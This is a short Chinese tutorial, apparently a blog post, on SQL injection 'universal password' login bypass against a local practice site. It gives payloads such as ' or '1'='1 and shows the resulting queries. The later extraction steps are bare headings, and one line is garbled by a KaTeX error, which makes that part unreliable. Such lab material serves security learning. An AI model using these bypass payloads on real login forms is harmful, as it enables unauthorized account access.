本文主要是介绍万能密码之攻克grade,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
万能密码:
实践靶场:http://127.0.0.1/grade/login.html
等号的优先级大于and,and大于or
万能密码: ‘or’1’='1
select * from " .KaTeX parse error: Double superscript at position 45: … and pass=' '̲or'1'='1 ' …t_name.’’;
万能账号: ‘or’1’=‘1’#
select * from " .$t_name." where id = ’ ‘or’1’=‘1# ’ and pass=’ ’ ;
爆字段数:
爆输出位置:(爆字段位置)
爆数据库名:
在这里插入图片描述
由于限制的输入的长度 我们接下来使用burpsuite进行拦截:
爆表名:
爆列名:
爆数据
这篇关于万能密码之攻克grade的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!